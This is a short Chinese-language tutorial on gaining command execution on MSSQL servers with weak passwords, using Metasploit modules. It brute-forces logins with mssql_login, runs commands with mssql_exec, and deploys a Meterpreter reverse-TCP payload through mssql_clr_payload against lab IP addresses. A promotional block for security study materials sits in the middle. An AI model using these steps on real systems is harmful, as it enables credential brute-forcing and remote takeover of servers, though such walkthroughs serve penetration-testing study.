Mssql弱命令提权

薛新民

Mssql弱命令提权

1、进入msf

msfconsole

进入msf
2、搜索爆破模块

search mssql_login

搜索爆破模块
3、使用爆破模块，并查看参数

use 0 或 use
auxiliary/scanner/mssql/mssql_login
show options

使用模块并查看参数
4、设置参数，并执行


设置参数
5、搜索执行命令模块

search mssql_exec

搜索执行命令模块
6、使用模块并查看参数

use 0 或 use
auxiliary/admin/mssql/mssql_exec
show options

使用模块并查看参数

【——全网最全的网络安全学习资料包分享给爱学习的你，关注我，私信回复“资料领取”获取——】
1.网络安全多个方向学习路线
2.全网最全的CTF入门学习资料
3.一线大佬实战经验分享笔记
4.网安大厂面试题合集
5.红蓝对抗实战技术秘籍
6.网络安全基础入门、Linux、web安全、渗透测试方面视频

7、设置参数，并执行

set rhosts 192.168.80.181
set password 1234567
set cmd cmd.exe /c "whoami"

设置参数并执行
8、搜索模块

search mssql_clr

搜索模块
9、使用模块并查看参数

use 0 或 use
exploit/windows/mssql/mssql_clr_payload
show options

使用模块并查看参数
10、设置参数，并执行

set rhosts 192.168.10.181
set password 1234567
set payload windows/x64/meterpreter/reverse_tcp
run

设置参数并执行
11、执行相关命令


相关命令